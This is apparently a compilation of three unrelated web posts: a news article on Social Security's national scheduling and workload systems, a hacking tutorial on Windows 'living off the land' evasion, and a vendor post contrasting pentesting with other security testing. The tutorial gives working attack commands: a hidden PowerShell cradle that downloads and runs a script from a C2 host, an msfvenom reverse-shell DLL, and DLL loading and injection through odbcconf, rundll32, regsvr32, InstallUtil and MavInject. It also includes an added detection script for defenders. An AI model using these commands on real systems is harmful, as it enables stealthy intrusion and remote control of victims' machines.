
Social Security seeks nationwide system to manage caseload for smaller workforce

The Social Security Administration is rolling out nationwide systems in the coming months that will impact how the agency schedules appointments for initial claims and triages its workload to employees.

SSA employees told Federal News Network that they’re used to processing claims submitted locally, but will soon tackle a nationwide inventory of cases.

Employees are wary that these changes will introduce more complexity to their workloads, as well as a higher risk of overpayments that SSA would have to claw back.

“Someone who applies in California could be speaking to an SSA rep in Maine,” one SSA employee said.

SSA is rolling out a National Appointment Scheduling Calendar (NASC) and National Workload Management (NWLM) for all field operations, digital services, and processing centers. Both systems will launch on March 7.

According to a Dec. 19 memo obtained by Federal News Network, the NASC will replace SSA’s current system for scheduling initial claims appointments, as well as local field office calendars.

SSA employees will use the NASC to schedule all initial claims appointments, and the system will also allow the public to self-schedule initial claims appointments.

The National Workload Management system will serve as the agency’s central workload management system. According to the memo, the system will distribute work to employees nationwide based on their “skillset, knowledge, and availability.”

“Employees will be assigned work by the NWLM based on the skillsets that they have, as determined by management. As a normal part of their routine duties, employees will be assigned to the NWLM and will be expected to use the tool to receive their workload assignments,” the memo states.

These systems will impact all employees in SSA field offices, digital services and processing centers.

“Both the NASC and NWLM are necessary to modernize our appointment systems and to provide a more balanced and consistent experience for both technicians and customers,” the memo states.

Richard Couture, president of the American Federation of Government Employees Council 215, said the union received notice of these changes, and that negotiations will soon begin.

A second SSA employee told Federal News Network that the purpose of these changes is to “smooth over” staffing shortages. The agency lost about 7,000 employees through voluntary incentives last year. It also relocated many of its employees from its headquarters and regional offices to field offices.

The employees said these upcoming changes would give staff “much less prep time” to handle a nationwide pool of cases.

“We are used to taking claims only for people in our area, so we expect to run into problems,” the second SSA employee said.

State laws introduce another layer of complexity to these cases. Some states, for example, have a higher income limit for SSA programs like Supplemental Security Income.

SSA employees outside Alaska aren’t familiar with how to treat annual payments adult residents receive from the state government based on oil revenue. Those payments from the Permanent Fund Dividend count as income to SSA programs like Social Security Income, and could potentially reduce benefits.

Many states offer a supplement to SSI benefits to help cover living costs for low-income seniors, as well as blind or disabled individuals. Those supplement amounts and eligibility vary state-by-state.

Some states let SSA manage these supplements, resulting in one combined check, while other states process their SSI supplements as a separate payment. Other states don’t offer these SSI supplements.

“We don’t have answers on how we are supposed to handle this,” the second SSA employee said.

The first SSA employee said staff were briefed on these changes this week. The employee said staff submitted multiple requests to management seeking clarification on these points, but were told to “worry about today, not tomorrow.”

Andy Sriubas, SSA’s chief of field operations, told employees in a Nov. 25 memo that the agency is taking steps to centralize more of its work.

“For decades, our ~1,250 field offices have operated as independent ‘mini-SSAs.’ That model no longer serves the public or our people. It prevents true specialization, limits the impact of technology, and produces backlogs we should not sustain,” he wrote.

Sriubas wrote that field offices “will always remain” as the agency’s primary point of contact for in-person services, and field office staff should be able to focus on serving people “face-to-face with empathy, accuracy, and speed.”

“Still too often, a day’s work is not finished in a day – impacting wait times, appointments, and pending items. That is not the level of service the American people deserve, nor is it the standard any of us should accept,” Sriubas wrote.

Sriubas wrote the agency’s website and the national 1-800 number handle “intake tasks well,” but said field operations “must evolve into a truly national system that leverages our full capacity.”

“The future is one SSA: a modern, client-centered agency where people receive service how, when and where they want it — online, by phone, or in person — regardless of their physical location, and every workflow flows to the team best equipped to complete it quickly and correctly,” he wrote.

SSA walks back memo limiting in-person services

In a separate memo, which an SSA spokesperson said has been rescinded, the agency directed field offices to only schedule initial claims over the phone, and to restrict in-person visits.

The memo, dated Dec. 31, directed field office employees to “convert all in-office appointments” scheduled on or after Jan. 6 to telephone appointments, and to “zero out all in-office availability” for appointments scheduled on or after March 9.

“This change prepares field offices and teleservice centers for the upcoming implementation of the National Appointment Scheduling Calendar,” the memo states.

The memo said in-person initial claim appointments would only be scheduled in “limited circumstances” when an appointment over the phone isn’t possible. Examples include an individual requiring a sign-language interpreter or who doesn’t have access to a phone.

“Only field office management may decide if an in-office appointment is appropriate; technicians must obtain permission from local management prior to scheduling the appointment,” the memo states.

According to this memo, the NASC will allow SSA to schedule initial claim appointments “based on national capacity, rather than local field office calendars.”

“Under NASC, [initial claim] appointments will be scheduled using available technician capacity nationwide, including first available appointment times across all U.S. time zones,” the memo states. “This shift supports a more consistent and efficient approach to IC scheduling and expands access by allowing the public to self-schedule IC appointments online.”

An SSA spokesperson told Federal News Network that “erroneous instructions recently issued have been withdrawn and our employees have been notified.”

The spokesperson said in a statement that the agency is still scheduling in-person appointments for initial claims, “and will continue to provide the public with in-person service at our more than 1,200 field offices nationwide.”

“We remain committed to ensuring that all individuals have access to the services they need and serving everyone in the way they wish to be served, including the option for in-person assistance,” the spokesperson said.

The second SSA employee, however, told Federal News Network that these plans will proceed, even if the memo outlining these changes has been rescinded.

“They are absolutely going forward with this plan. I expect there could be delays, but they have every intention of making this happen,” the employee said.

SSA is looking to cut visits to its field offices in half this year. NextGov/FCW first reported on SSA’s plans to cut 15 million field office visits this year.

The post Social Security seeks nationwide system to manage caseload for smaller workforce first appeared on Federal News Network.

© AP Photo/Nam Y. Huh

PowerShell for Hackers – Survival Edition, Part 4: Blinding Defenders

Welcome back, cyberwarriors! 

We hope that throughout the Survival series, you have been learning a lot from us. Today, we introduce Living off the Land techniques that can be abused without triggering alarms. Our goal is to use knowledge from previous articles to get our job done without unnecessary attention from defenders. All the commands we cover in two parts are benign, native, and also available on legacy systems. Not all are well-known, and tracking them all is impossible as they generate tons of logs that are hard to dig through. As you may know, some legitimate software may act suspiciously with its process and driver names. Tons of false positives quickly drain defenders, so in many environments, you can fly under the radar with these commands. 

Today, you’ll learn how to execute different kinds of scripts as substitutes for .ps1 scripts since they can be monitored, create fake drivers, and inject DLLs into processes to get a reverse shell to your C2.

Let’s get started!

Execution and Scripting

Powershell

Let’s recall the basic concepts of stealth in PowerShell from earlier articles. PowerShell is a built-in scripting environment used by system administrators to automate tasks, check system status, and configure Windows. It’s legitimate and not suspicious unless executed where it shouldn’t be. Process creation can be monitored, but this isn’t always the case. It requires effort and software to facilitate such monitoring. The same applies to .ps1 scripts. This is why we learned how to convert .ps1 to .bat to blend in in one of the previous articles. It doesn’t mean you should avoid PowerShell or its scripts, as you can create a great variety of tools with it. 

Here’s a reminder of how to download and execute a script in memory with stealth:

PS > powershell.exe -nop -w h -ep bypass -c "iex (New-Object Net.WebClient).DownloadString('http://C2/script.ps1')"

Walkthrough: This tells PowerShell to start quickly without loading user profile scripts (-nop), hide the window (-w h), ignore script execution rules (-ep bypass), download a script from a URL, and run it directly in memory (DownloadString + Invoke-Expression).

When you would use it: When you need to fetch a script from a remote server and run it quietly.

Why it’s stealthy: PowerShell is common for admin tasks, and in-memory execution leaves no file on disk for antivirus to scan. Skipping user profile scripts avoids potential monitoring embedded in them.

A less stealthy option would be:

PS > iwr http://c2/script.ps1 | iex 

It’s important to keep in mind that Invoke-WebRequest (iwr) and Invoke-Expression (iex) are often abused by hackers. Later, we’ll cover stealthier ways to download and execute payloads.

CMD

CMD is the classic Windows command prompt used to run batch files and utilities. Although this module focuses on PowerShell, stealth is our main concern, so we cover some CMD commands. With its help, we can chain utilities, redirect outputs to files, and collect system information quietly.

Here’s how to chain enumeration with CMD:

PS > cmd.exe /c "whoami /all > C:\Temp\privs.txt & netstat -ano >> C:\Temp\privs.txt"

using cmd to chain commands

Walkthrough: /c runs the command and exits. whoami /all gets user and privilege info and writes it to C:\Temp\privs.txt. netstat -ano appends active network connections to the same file. The user doesn’t see a visible window.

When you would use it: Chaining commands is handy, especially if Script Block Logging is in place and your commands get saved.

Why it’s stealthy: cmd.exe is used everywhere, and writing to temp files looks like routine diagnostics.

cscript.exe

This runs VBScript or JScript scripts from the command line. Older automation relies on it to execute scripts that perform checks or launch commands. Mainly we will use it to bypass ps1 execution monitoring. Below, you can see how we executed a JavaScript script.

PS > cscript //E:JScript //Nologo C:\Temp\script.js

using cscript to load js files

Walkthrough: //E:JScript selects the JavaScript engine, while //Nologo hides the usual header. The final argument points to the script that will be run.

When you would use it: All kinds of use. With the help of AI you can write an enumeration script.

Why it’s stealthy: It’s less watched than PowerShell in some environments and looks like legacy automation.

wscript.exe

By default, it runs Windows Script Host (WSH) scripts (VBScript/JScript), often for scripts showing dialogs. As a pentester, you can run a VBScript in the background or perform shell operations without visible windows.

PS > wscript.exe //E:VBScript C:\Temp\enum.vbs //B

using wscript to run vbs scripts

Walkthrough: //B runs in batch mode (no message boxes). The VBScript at C:\Temp\enum.vbs is executed by the Windows Script Host.

When you would use it: Same thing here, it really depends on the script you create. We made a system enumeration script that sends output to a text file. 

Why it’s stealthy: Runs without windows and is often used legitimately.

mshta.exe

Normally, it runs HTML Applications (HTA) containing scripts, used for small admin UIs. For pentesters, it’s a way to execute HTA scripts with embedded code. It requires a graphical interface.

PS > mshta users.hta 

using mshta to run hta scripts

Walkthrough: mshta.exe runs script code in users.hta, which could create a WScript object and execute commands, potentially opening a window with output.

When you would use it: To run a seemingly harmless HTML application that executes shell commands.

Why it’s stealthy: It looks like a web or UI component and can bypass some script-only rules.

DLL Loading and Injections

These techniques rely on legitimate DLL loading or registration mechanics to get code running.

Rundll32.exe

Used to load a DLL and call its exported functions, often by installers and system utilities. Pentesters can use it to execute a script or function in a DLL, like a reverse shell generated by msfvenom. Be cautious, as rundll32.exe is frequently abused.

C:\> rundll32.exe C:\reflective_dll.x64.dll,TestEntry

using rundll32 to run dlls

Walkthrough: The command runs rundll32.exe to load reflective_dll.x64.dll and call its TestEntry function.

When you would use it: To execute a DLL’s code in environments where direct execution is restricted.

Why it’s stealthy: rundll32.exe is a common system binary and its activity can blend into normal installer steps.

Regsvr32.exe

In plain terms it adds or removes special Windows files (like DLLs or scriptlets) from the system’s registry so that applications can use or stop using them. It is another less frequently used way to execute DLLs.

PS > regsvr32.exe /u /s .\reflective_dll.x64.dll

using regsvr32 to run dlls

Walkthrough: regsvr32 is asked to load the DLL. /u requests an unregister (the DLL’s DllUnregisterServer export is called), and /s makes it silent, suppressing message boxes.

When you would use it: To execute a DLL via a registration process, mimicking maintenance tasks.

Why it’s stealthy: Registration operations are normal in IT workflows, so the call can be overlooked.

odbcconf.exe

Normally, odbcconf.exe helps programs connect to databases by setting up drivers and connections. You can abuse it to run your DLLs. Below is an example of how we executed a generated DLL and got a reverse shell.

bash > msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.15.57 LPORT=4444 -f dll -o file.dll

generating a dll file

PS > odbcconf.exe INSTALLDRIVER "Printer-driverX|Driver=C:\file.dll|APILevel=2"

PS > odbcconf.exe CONFIGSYSDSN "Printer-driverX" "DSN=Printer-driverX"

creating a fake driver with odbcconf
receiving the connection back to the C2

Walkthrough: The first odbcconf command tells Windows to register a fake database driver named “Printer-driverX” using a DLL file. The APILevel=2 part makes it look like a legitimate driver. When Windows processes this, it loads file.dll, which runs the reverse shell inside it. The second odbcconf command creates a system data source (DSN) named “Printer-driverX” tied to that fake driver, which triggers the DLL to load again, ensuring the malicious code runs.

When you would use it: To execute a custom DLL stealthily, especially when other methods are monitored.

Why it’s stealthy: odbcconf is a legit Windows tool rarely used outside database admin tasks, so it’s not heavily monitored by security tools or admins on most systems. Using it to load a DLL looks like normal database setup activity, hiding the malicious intent.

Installutil.exe

Normally, it is a Windows tool that installs or uninstalls .NET programs, like DLLs or executables, designed to run as services or components. It sets them up so they can work with Windows, like registering them to start automatically, or removes them when they’re no longer needed. In pentest scenarios, the command is used to execute malicious code hidden in a specially crafted .NET DLL by pretending to uninstall it as a .NET service.

PS > InstallUtil.exe /logfile= /LogToConsole=false /U file.dll

Walkthrough: The command tells Windows to uninstall a .NET assembly (file.dll) that was previously set up as a service or component. The /U flag means uninstall, /logfile= skips creating a log file, and /LogToConsole=false hides any output on the screen. If file.dll is a malicious .NET assembly with a custom installer class, uninstalling it can trigger its code, like a reverse shell when the command processes the uninstall. However, for a DLL from msfvenom, this may not work as intended unless it’s specifically a .NET service DLL.

When you would use it: It’s useful when you have admin access and need to execute a .NET payload stealthily, especially if other methods are unavailable.

Why it’s stealthy: Install utilities are commonly used by developers and administrators.

Mavinject.exe

Essentially, it was designed to help with Application Virtualization, when Windows executes apps in a virtual container. We use it to inject DLLs into running processes to get our code executed. We recommend using system processes for injections, such as svchost.exe. Here is how it’s done:

PS > MavInject.exe 528 /INJECTRUNNING C:\file.dll

using mavinject to inject dlls into processes and get a reverse shell

Walkthrough: Targets process ID 528 (svchost.exe) and instructs MavInject.exe to inject file.dll into it. When the DLL loads, it runs the code and we get a connection back.

When you would use it: To inject a DLL for a high-privilege reverse shell, like SYSTEM access.

Why it’s stealthy: MavInject.exe is a niche Microsoft tool, so it’s rarely monitored by security software or admins, making the injection look like legitimate system behavior.

Summary

Living off the Land techniques matter a lot in Windows penetration testing, as they let you achieve your objectives using only built-in Microsoft tools and signed binaries. That reduces forensic footprints and makes your activity blend with normal admin behavior, which increases the chance of bypassing endpoint protections and detection rules. In Part 1 we covered script execution and DLL injections, some of which will significantly improve your stealth and capabilities. In Part 2, you will explore network recon, persistence, and file management to further evade detection. Defenders can also learn a lot from this to shape their detection strategies. But as mentioned earlier, monitoring system binaries might generate a lot of false positives.
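A defender-side triage of the command lines covered above, as an added example that is not part of the post (written in Python rather than the post's PowerShell so it runs wherever the logs are collected). It assumes Sysmon-style Image/CommandLine lines; the TRUSTED_DIRS allow-list, rule names and weights are assumptions, and the sample events are constructed. It addresses the false-positive concern from the summary by keying on where the DLL or script is loaded from, so routine uses of the same binaries do not fire.

```python
"""Defender-side triage for the LOLBin command lines discussed in this post.

Added example, not code from the post. It scores constructed process-creation
events (Sysmon Event ID 1 style: Image and CommandLine) against the argument
patterns the post relies on. TRUSTED_DIRS, rule names and weights are assumptions.
"""
import re
from os.path import basename

# Assumed allow-list: DLLs and scripts loaded from here count as routine.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files")

# A quoted path (may contain spaces) or a bare path with a loadable extension.
PATH_RE = re.compile(
    r'"([^"]*?\.(?:dll|js|vbs|hta))"|([\w:.\\~-]+\.(?:dll|js|vbs|hta))', re.I)
EVENT_RE = re.compile(r"Image=(\S+)\s+CommandLine=(.*)")


def untrusted_paths(cmd):
    """Loadable paths in the command line that sit outside TRUSTED_DIRS."""
    paths = [quoted or bare for quoted, bare in PATH_RE.findall(cmd)]
    return [p for p in paths if not p.lower().startswith(TRUSTED_DIRS)]


def ps_cradle(cmd):
    """Download-and-run cradle combined with the quiet flags shown above."""
    cradle = re.search(r"downloadstring|invoke-expression|\b(?:iex|iwr)\b", cmd)
    quiet = re.search(r"-(?:ep|executionpolicy) bypass|-w h\b|-windowstyle hidden|-nop\b", cmd)
    return bool(cradle and quiet)


def installutil_quiet(cmd):
    """/U together with an empty /logfile= or console logging switched off."""
    return bool(re.search(r"/u\b", cmd)
                and re.search(r"/logfile=(?:\s|$)|/logtoconsole=false", cmd))


# (rule name, image basename regex, predicate over lower-cased command line, weight)
RULES = [
    ("powershell_download_cradle", r"^(?:powershell|pwsh)(?:\.exe)?$", ps_cradle, 80),
    ("wsh_engine_override_untrusted", r"^[cw]script(?:\.exe)?$",
     lambda c: "//e:" in c and bool(untrusted_paths(c)), 60),
    ("mshta_untrusted_hta", r"^mshta(?:\.exe)?$", lambda c: bool(untrusted_paths(c)), 60),
    ("rundll32_untrusted_dll", r"^rundll32(?:\.exe)?$", lambda c: bool(untrusted_paths(c)), 70),
    ("regsvr32_silent_untrusted", r"^regsvr32(?:\.exe)?$",
     lambda c: "/s" in c and bool(untrusted_paths(c)), 70),
    ("odbcconf_driver_untrusted", r"^odbcconf(?:\.exe)?$",
     lambda c: "installdriver" in c and bool(untrusted_paths(c)), 90),
    ("installutil_quiet_uninstall", r"^installutil(?:\.exe)?$", installutil_quiet, 70),
    ("mavinject_injectrunning", r"^mavinject(?:\.exe)?$", lambda c: "/injectrunning" in c, 95),
]


def score_event(image, cmdline):
    """Return (score capped at 100, [matching rule names]) for one event."""
    name, cmd = basename(image.replace("\\", "/")).lower(), cmdline.lower()
    hits = [(rule, w) for rule, img, pred, w in RULES if re.match(img, name) and pred(cmd)]
    return min(100, sum(w for _, w in hits)), [rule for rule, _ in hits]


def scan_log(lines):
    """Yield (line number, image basename, score, rules) for events that fire."""
    for n, line in enumerate(lines, 1):
        m = EVENT_RE.search(line)
        if m:
            score, rules = score_event(m.group(1), m.group(2))
            if rules:
                yield n, basename(m.group(1).replace("\\", "/")), score, rules


# Constructed sample telemetry: the post's commands next to routine look-alikes.
SAMPLE_EVENTS = [
    r'''Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell.exe -nop -w h -ep bypass -c "iex (New-Object Net.WebClient).DownloadString('http://C2/script.ps1')"''',
    r"Image=C:\Windows\System32\cscript.exe CommandLine=cscript //E:JScript //Nologo C:\Temp\script.js",
    r"Image=C:\Windows\System32\cscript.exe CommandLine=cscript.exe C:\Windows\System32\slmgr.vbs /dlv",
    r"Image=C:\Windows\System32\mshta.exe CommandLine=mshta users.hta",
    r"Image=C:\Windows\System32\rundll32.exe CommandLine=rundll32.exe C:\reflective_dll.x64.dll,TestEntry",
    r"Image=C:\Windows\System32\rundll32.exe CommandLine=rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
    r"Image=C:\Windows\System32\regsvr32.exe CommandLine=regsvr32.exe /u /s .\reflective_dll.x64.dll",
    r'Image=C:\Windows\System32\regsvr32.exe CommandLine=regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"',
    r'Image=C:\Windows\System32\odbcconf.exe CommandLine=odbcconf.exe INSTALLDRIVER "Printer-driverX|Driver=C:\file.dll|APILevel=2"',
    r"Image=C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe CommandLine=InstallUtil.exe /logfile= /LogToConsole=false /U file.dll",
    r"Image=C:\Windows\System32\mavinject.exe CommandLine=MavInject.exe 528 /INJECTRUNNING C:\file.dll",
]

if __name__ == "__main__":
    for n, image, score, rules in scan_log(SAMPLE_EVENTS):
        print(f"line {n}: {image} score={score} rules={rules}")
```

Lines 3, 6 and 8 of the sample are the routine look-alikes and produce no finding, because the script or DLL is loaded from an allow-listed directory.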

Resources:

https://lofl-project.github.io

https://lolbas-project.github.io/#

The post PowerShell for Hackers – Survival Edition, Part 4: Blinding Defenders first appeared on Hackers Arise.

What You’re Missing About Pentesting: 6 Tools That Look Like Pentesting But Aren’t

By: Synack

By Kim Crawley

Not everything that’s called “pentesting” is pentesting. There’s an abundance of different types of security testing and tools that use different methodologies for different stakeholders with differing agendas. Security testing, which includes pentesting and also vulnerability assessment, compliance auditing and other formats, is even broader. We’ll break down the differences between types of pentesting and strategies that are labeled pentesting but are fundamentally different. 

First, what are you testing for?

Are you trying to penetrate a network or computer system like a cyber threat actor, but with permission from the owner for the purposes of discovering security vulnerabilities? Then chances are what you’re doing is pentesting. If you’re using a checklist of security standards of some sort and looking for vulnerabilities without simulating cyber attacks, that’s a vulnerability assessment. It sounds obvious, but some entities try to sell vulnerability assessments by incorrectly calling them pentests. Pentests aren’t “better” than vulnerability assessments; they’re different types of security testing. Each can be the best solution for different problems.

The Flavors of Pentesting

Pentesting is having specially trained people simulate cyber attacks. They can use applications, scripts and even conduct analog activities such as social engineering and physical security pentesting. Its strength and weakness is the people doing the testing and the platform they work on. Without good testers on an efficient platform, the test may not leave the buyer with confidence. Traditional pentesting relies on only the skills of a few people and outputs a readable report, not data. Synack was founded to get the best testers on the best platform for the best pentest possible. A pentest’s output – at least Synack style – is real-time access to findings, remediation information, analytics about testing and more.

Different types of pentesting can be categorized according to which facet of a computer system is being tested. The majors are network pentesting, application pentesting, social engineering pentesting that finds vulnerabilities in people and physical pentesting that finds vulnerabilities in buildings, doors, windows, rooms and the like. 

Pentesting is also categorized according to the information available to the testers. Blackbox testing is done with little to no knowledge of a target from the perspective of an external attacker. Whitebox testing is done with in-depth target knowledge from the perspective of an internal attacker in the target’s IT department. And Greybox testing is in the middle from the perspective of a nontechnical insider. 

There are also other ways to prepare for cyber threats that are different from pentesting. Let’s explore some of them. 

Methodologies for Security Testing (That Aren’t Pentesting)

Breach and Attack Simulation (BAS) based on attack replay or scripting is a relatively recent development in security testing tech. Scripts that simulate specific exploits can be executed whenever an administrator needs to test a particular attack. This way, teams are better trained to know how to spot attack patterns and unusual log activity. When the cybersecurity community discovers new exploits, scripts can be used to simulate those exploits. Note that this takes time, so BAS may not be as current as adversarial tradecraft. The testing-like output is confirmation of how many known vulnerabilities with easily scriptable exploits exist in your environment.

BAS is best suited for testing security responses to ensure teams know how to spot attack patterns and strange attacks in their log systems. This is a great training tool for blue teams but will not result in the discovery of unknown vulnerabilities in general. This shouldn’t be viewed as a pen test replacement and usually the scripted models lag the current adversary tradecraft. 

Bug Bounty welcomes members of the general public under well-defined policies to security test your software themselves and submit bug reports to your company according to the principles of responsible disclosure. If a bug can be proven and fits your company’s criteria of a prioritized vulnerability, the bug hunter could be awarded a monetary prize of anywhere from $50 to $100,500, but typical bug bounty rewards are about $200 to $1,000. The amount of money awarded for a valuable bug report is affected by several factors including the size of the company’s budget and user base and the criticality of the bug.

Dynamic Application Security Testing (DAST) is an automated technique, but it’s exclusively for testing working applications. So it’s often a tool used by application developers. DAST is used most often for web applications, but other internet-connected applications can be tested this way too. The targeted application must be running, such as a web application on the internet. The exploits that are executed are dynamic, so they may alter course depending on the progress of penetration. 

Risk assessments are sometimes called threat evaluations. In a risk assessment, your security team collaborates with what they know about your organization’s data assets and how those assets could be threatened, both by cyber attack and by non-malicious threats such as natural disasters and accidents. Risks are identified, estimated and prioritized according to their probability of occurring and the amount of harm that could result.

Static Application Security Testing (SAST) has the same goals as DAST, but for application code before being compiled, not for applications that are running in production mode. If a vulnerability is clear from source code – and not all are – it can be detected by SAST.

Tabletop exercises are mainly for incident response teams, a defensive security function. They can be a fun challenge when done well, and help your incident response group face cyber threats with greater confidence. Specific attacks are proposed in the exercise, and the team needs to figure out how they should prevent, mitigate, or contain the cyber threat. If Capture The Flag is the main educational game for the red team, tabletop is the main educational game for the blue team. The output is a more confident and prepared team. Sometimes, refinements for an organization’s threat modeling also emerge. But actual vulnerabilities will not often be found during these exercises.

These and other newer technologies (artificial intelligence and machine learning in particular) are useful tools for security leaders. Computer software acts faster and doesn’t get tired, but the most flexible thinking comes directly from human beings. 

Computer scientists know that computers can only simulate randomness; it takes a living being to actually be random. And human pentesters, like the Synack Red Team, are the best at simulating human cyber attackers and the serious exploits they regularly find.

For a deeper look at the Synack Red Team and its diverse skill set, read our latest white paper, “Solving the Cyber Talent Gap with Diverse Expertise.”

The post What You’re Missing About Pentesting: 6 Tools That Look Like Pentesting But Aren’t appeared first on Synack.
